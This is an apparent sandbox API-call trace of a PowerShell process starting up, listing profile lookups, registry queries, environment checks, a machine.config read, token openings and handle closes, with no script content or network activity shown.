	[0653.032] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28dc20 | out: lpFileInformation=0x28dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0653.032] SetErrorMode (uMode=0x1) returned 0x1
	[0653.032] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x28da10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0653.032] SetErrorMode (uMode=0x1) returned 0x1
	[0653.032] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28dc20 | out: lpFileInformation=0x28dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0653.032] SetErrorMode (uMode=0x1) returned 0x1
	[0653.035] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0653.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.035] CoTaskMemFree (pv=0x49d470) 
	[0653.036] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0653.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.037] CoTaskMemFree (pv=0x49d470) 
	[0653.039] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0653.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.039] CoTaskMemFree (pv=0x49d470) 
	[0653.042] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0653.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.042] CoTaskMemFree (pv=0x49d470) 
	[0653.047] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0653.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.048] CoTaskMemFree (pv=0x49d470) 
	[0653.049] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x30c
	[0653.049] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0653.049] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d0
	[0653.050] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d8
	[0653.050] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0653.050] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x33c
	[0653.050] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0653.050] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0653.050] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a4
	[0654.581] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x354
	[0654.582] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358
	[0654.582] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x35c
	[0654.584] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0654.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.584] CoTaskMemFree (pv=0x49d470) 
	[0654.587] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0654.587] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x28de00 | out: lpMode=0x28de00) returned 1
	[0654.589] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0654.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.589] CoTaskMemFree (pv=0x49d470) 
	[0654.593] SetEvent (hEvent=0x1d8) returned 1
	[0654.594] SetEvent (hEvent=0x30c) returned 1
	[0654.594] SetEvent (hEvent=0x334) returned 1
	[0654.594] SetEvent (hEvent=0x1d0) returned 1
	[0654.594] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x360
	[0654.598] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0654.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.598] CoTaskMemFree (pv=0x49d470) 
	[0654.599] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x28db58 | out: phkResult=0x28db58*=0x364) returned 0x0
	[0654.599] RegQueryValueExW (in: hKey=0x364, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x28dadc, lpData=0x0, lpcbData=0x28dad8*=0x0 | out: lpType=0x28dadc*=0x0, lpData=0x0, lpcbData=0x28dad8*=0x0) returned 0x2

Thread:
	id = 325
	os_tid = 0xfc8


Thread:
	id = 334
	os_tid = 0xc0c


Thread:
	id = 842
	os_tid = 0x1264


Thread:
	id = 850
	os_tid = 0x12d4


Thread:
	id = 865
	os_tid = 0x13d8


Thread:
	id = 883
	os_tid = 0x116c


Thread:
	id = 889
	os_tid = 0xdf4

	[0483.634] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0565.412] LocalFree (hMem=0x3e7310) returned 0x0
	[0565.412] CloseHandle (hObject=0x328) returned 1
	[0565.412] CloseHandle (hObject=0x13) returned 1
	[0565.413] CloseHandle (hObject=0xf) returned 1
	[0565.413] RegCloseKey (hKey=0x1d8) returned 0x0
	[0565.414] RegCloseKey (hKey=0x1d0) returned 0x0
	[0565.414] RegCloseKey (hKey=0x30c) returned 0x0
	[0565.414] LocalFree (hMem=0x3e7360) returned 0x0
	[0565.414] RegCloseKey (hKey=0x334) returned 0x0
	[0593.696] RegCloseKey (hKey=0x310) returned 0x0
	[0610.451] RegCloseKey (hKey=0x310) returned 0x0
	[0627.979] RegCloseKey (hKey=0x39c) returned 0x0
	[0627.979] RegCloseKey (hKey=0x398) returned 0x0
	[0627.979] RegCloseKey (hKey=0x374) returned 0x0
	[0627.980] RegCloseKey (hKey=0x3b0) returned 0x0
	[0627.980] RegCloseKey (hKey=0x390) returned 0x0
	[0627.980] RegCloseKey (hKey=0x38c) returned 0x0
	[0627.981] RegCloseKey (hKey=0x388) returned 0x0
	[0627.981] RegCloseKey (hKey=0x384) returned 0x0
	[0627.981] RegCloseKey (hKey=0x380) returned 0x0
	[0627.982] RegCloseKey (hKey=0x37c) returned 0x0
	[0627.982] RegCloseKey (hKey=0x378) returned 0x0
	[0627.982] RegCloseKey (hKey=0x350) returned 0x0
	[0627.982] RegCloseKey (hKey=0x3ac) returned 0x0
	[0627.983] RegCloseKey (hKey=0x3a8) returned 0x0
	[0627.983] RegCloseKey (hKey=0x370) returned 0x0
	[0627.983] RegCloseKey (hKey=0x36c) returned 0x0
	[0627.983] RegCloseKey (hKey=0x368) returned 0x0
	[0627.984] RegCloseKey (hKey=0x364) returned 0x0
	[0627.984] RegCloseKey (hKey=0x360) returned 0x0
	[0627.984] RegCloseKey (hKey=0x35c) returned 0x0
	[0627.985] RegCloseKey (hKey=0x358) returned 0x0
	[0627.985] RegCloseKey (hKey=0x354) returned 0x0
	[0627.985] RegCloseKey (hKey=0x3a4) returned 0x0
	[0627.986] RegCloseKey (hKey=0x344) returned 0x0
	[0627.986] RegCloseKey (hKey=0x340) returned 0x0
	[0627.986] RegCloseKey (hKey=0x33c) returned 0x0
	[0627.986] RegCloseKey (hKey=0x328) returned 0x0
	[0627.987] RegCloseKey (hKey=0x1d8) returned 0x0
	[0627.987] RegCloseKey (hKey=0x1d0) returned 0x0
	[0627.987] RegCloseKey (hKey=0x30c) returned 0x0
	[0627.988] RegCloseKey (hKey=0x334) returned 0x0
	[0627.988] RegCloseKey (hKey=0x3a0) returned 0x0
	[0627.988] RegCloseKey (hKey=0x310) returned 0x0
	[0701.748] RegCloseKey (hKey=0x364) returned 0x0
	[0783.600] CloseHandle (hObject=0x460) returned 1
	[0783.600] CloseHandle (hObject=0x40c) returned 1
	[0783.600] CloseHandle (hObject=0x408) returned 1
	[0783.601] CloseHandle (hObject=0x4c0) returned 1
	[0783.601] CloseHandle (hObject=0x3b8) returned 1
	[0783.602] CloseHandle (hObject=0x4bc) returned 1
	[0783.602] CloseHandle (hObject=0x394) returned 1
	[0783.602] CloseHandle (hObject=0x39c) returned 1
	[0783.603] CloseHandle (hObject=0x398) returned 1
	[0783.603] CloseHandle (hObject=0x374) returned 1
	[0783.604] CloseHandle (hObject=0x38c) returned 1
	[0783.604] CloseHandle (hObject=0x388) returned 1
	[0783.604] CloseHandle (hObject=0x384) returned 1
	[0783.605] CloseHandle (hObject=0x380) returned 1
	[0783.605] CloseHandle (hObject=0x464) returned 1
	[0783.605] CloseHandle (hObject=0x37c) returned 1
	[0783.606] CloseHandle (hObject=0x350) returned 1
	[0783.606] CloseHandle (hObject=0x378) returned 1
	[0783.607] CloseHandle (hObject=0x364) returned 1
	[0904.719] CertFreeCRLContext (pCrlContext=0x1b91cd80) returned 1
	[0904.719] CertFreeCRLContext (pCrlContext=0x1b91ce00) returned 1
	[0904.720] CertFreeCRLContext (pCrlContext=0x1cf4cf70) returned 1
	[0904.720] CertFreeCRLContext (pCrlContext=0x1b91cd80) returned 1
	[0904.721] CertFreeCRLContext (pCrlContext=0x1cf4cff0) returned 1
	[0904.722] CloseHandle (hObject=0x4d0) returned 1
	[0904.722] CertCloseStore (hCertStore=0x447c80, dwFlags=0x0) returned 1

Thread:
	id = 940
	os_tid = 0x1924


Thread:
	id = 1290
	os_tid = 0x1d2c

	[0656.328] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0656.333] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0656.338] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0656.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.338] CoTaskMemFree (pv=0x49d470) 
	[0656.340] VirtualQuery (in: lpAddress=0x1c77d6a0, lpBuffer=0x1c77e560, dwLength=0x30 | out: lpBuffer=0x1c77e560*(BaseAddress=0x1c77d000, AllocationBase=0x1bdf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0656.346] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0656.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.346] CoTaskMemFree (pv=0x49d470) 
	[0656.348] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0656.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.349] CoTaskMemFree (pv=0x49d470) 
	[0656.352] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0656.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.352] CoTaskMemFree (pv=0x49d470) 
	[0656.370] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0656.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.370] CoTaskMemFree (pv=0x49d470) 
	[0656.372] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0656.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0656.373] CoTaskMemFree (pv=0x49d470) 
	[0658.135] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0658.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.135] CoTaskMemFree (pv=0x49d470) 
	[0658.140] VirtualQuery (in: lpAddress=0x1c77d950, lpBuffer=0x1c77e810, dwLength=0x30 | out: lpBuffer=0x1c77e810*(BaseAddress=0x1c77d000, AllocationBase=0x1bdf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0658.141] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0658.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.141] CoTaskMemFree (pv=0x49d470) 
	[0658.144] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0658.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.144] CoTaskMemFree (pv=0x49d470) 
	[0658.144] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0658.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.144] CoTaskMemFree (pv=0x49d470) 
	[0658.146] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0658.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.146] CoTaskMemFree (pv=0x49d470) 
	[0658.151] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0658.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.151] CoTaskMemFree (pv=0x49d470) 
	[0661.350] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0661.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.351] CoTaskMemFree (pv=0x49d470) 
	[0661.353] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0661.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.353] CoTaskMemFree (pv=0x49d470) 
	[0661.355] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0661.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.355] CoTaskMemFree (pv=0x49d470) 
	[0661.357] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0661.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.357] CoTaskMemFree (pv=0x49d470) 
	[0661.359] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0661.359] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.359] CoTaskMemFree (pv=0x49d470) 
	[0661.361] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0661.361] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.361] CoTaskMemFree (pv=0x49d470) 
	[0661.363] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0661.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.363] CoTaskMemFree (pv=0x49d470) 
	[0661.382] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0661.382] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.382] CoTaskMemFree (pv=0x49d470) 
	[0664.615] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0664.615] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.615] CoTaskMemFree (pv=0x49d470) 
	[0664.619] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0664.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.619] CoTaskMemFree (pv=0x49d470) 
	[0664.623] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0664.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.623] CoTaskMemFree (pv=0x49d470) 
	[0666.328] CoTaskMemAlloc (cb=0x104) returned 0x49d470
	[0666.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d470, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.328] CoTaskMemFree (pv=0x49d470) 
	[0721.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c77d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0721.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c77d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0723.360] CoTaskMemAlloc (cb=0x20c) returned 0x1b8db310
	[0723.360] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b8db310, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0723.360] CoTaskMemFree (pv=0x1b8db310) 
	[0723.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c77d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0723.363] GetCurrentProcess () returned 0xffffffffffffffff
	[0723.364] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d2e8 | out: TokenHandle=0x1c77d2e8*=0x364) returned 1
	[0723.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c77cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0723.370] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c77d390 | out: lpFileInformation=0x1c77d390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0723.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c77cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0723.372] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c77d340 | out: lpFileInformation=0x1c77d340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0723.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c77cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0723.373] SetErrorMode (uMode=0x1) returned 0x1
	[0723.373] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x378
	[0723.373] GetFileType (hFile=0x378) returned 0x1
	[0723.373] SetErrorMode (uMode=0x1) returned 0x1
	[0723.373] GetFileType (hFile=0x378) returned 0x1
	[0723.376] GetFileSize (in: hFile=0x378, lpFileSizeHigh=0x1c77d338 | out: lpFileSizeHigh=0x1c77d338*=0x0) returned 0x622a
	[0723.376] ReadFile (in: hFile=0x378, lpBuffer=0x2f8ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c77d258, lpOverlapped=0x0 | out: lpBuffer=0x2f8ebe8*, lpNumberOfBytesRead=0x1c77d258*=0x1000, lpOverlapped=0x0) returned 1
	[0723.387] ReadFile (in: hFile=0x378, lpBuffer=0x2f8ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c77cd88, lpOverlapped=0x0 | out: lpBuffer=0x2f8ebe8*, lpNumberOfBytesRead=0x1c77cd88*=0x1000, lpOverlapped=0x0) returned 1
	[0723.389] ReadFile (in: hFile=0x378, lpBuffer=0x2f8ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c77cd88, lpOverlapped=0x0 | out: lpBuffer=0x2f8ebe8*, lpNumberOfBytesRead=0x1c77cd88*=0x1000, lpOverlapped=0x0) returned 1
	[0723.389] ReadFile (in: hFile=0x378, lpBuffer=0x2f8ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c77cd88, lpOverlapped=0x0 | out: lpBuffer=0x2f8ebe8*, lpNumberOfBytesRead=0x1c77cd88*=0x1000, lpOverlapped=0x0) returned 1
	[0723.389] ReadFile (in: hFile=0x378, lpBuffer=0x2f8ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c77cd88, lpOverlapped=0x0 | out: lpBuffer=0x2f8ebe8*, lpNumberOfBytesRead=0x1c77cd88*=0x1000, lpOverlapped=0x0) returned 1
	[0723.397] ReadFile (in: hFile=0x378, lpBuffer=0x2f8ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c77cec8, lpOverlapped=0x0 | out: lpBuffer=0x2f8ebe8*, lpNumberOfBytesRead=0x1c77cec8*=0x1000, lpOverlapped=0x0) returned 1
	[0723.397] ReadFile (in: hFile=0x378, lpBuffer=0x2f8ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c77cd48, lpOverlapped=0x0 | out: lpBuffer=0x2f8ebe8*, lpNumberOfBytesRead=0x1c77cd48*=0x22a, lpOverlapped=0x0) returned 1
	[0723.397] ReadFile (in: hFile=0x378, lpBuffer=0x2f8ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c77cde8, lpOverlapped=0x0 | out: lpBuffer=0x2f8ebe8*, lpNumberOfBytesRead=0x1c77cde8*=0x0, lpOverlapped=0x0) returned 1
	[0723.398] CloseHandle (hObject=0x378) returned 1
	[0723.399] CoTaskMemAlloc (cb=0x20c) returned 0x1b8db310
	[0723.399] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b8db310, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0723.399] CoTaskMemFree (pv=0x1b8db310) 
	[0723.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c77d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0723.399] GetCurrentProcess () returned 0xffffffffffffffff
	[0723.399] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d548 | out: TokenHandle=0x1c77d548*=0x378) returned 1
	[0723.400] GetCurrentProcess () returned 0xffffffffffffffff
	[0723.400] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d548 | out: TokenHandle=0x1c77d548*=0x350) returned 1
	[0723.401] GetCurrentProcess () returned 0xffffffffffffffff
	[0723.401] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d2e8 | out: TokenHandle=0x1c77d2e8*=0x37c) returned 1
	[0723.402] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c77d340 | out: lpFileInformation=0x1c77d340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0723.403] GetCurrentProcess () returned 0xffffffffffffffff
	[0723.403] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d548 | out: TokenHandle=0x1c77d548*=0x380) returned 1
	[0723.403] GetCurrentProcess () returned 0xffffffffffffffff
	[0723.403] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d548 | out: TokenHandle=0x1c77d548*=0x384) returned 1
	[0725.105] GetCurrentProcess () returned 0xffffffffffffffff
	[0725.105] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d1c8 | out: TokenHandle=0x1c77d1c8*=0x388) returned 1
	[0726.667] GetCurrentProcess () returned 0xffffffffffffffff
	[0726.667] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77d1c8 | out: TokenHandle=0x1c77d1c8*=0x38c) returned 1
	[0726.683] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390
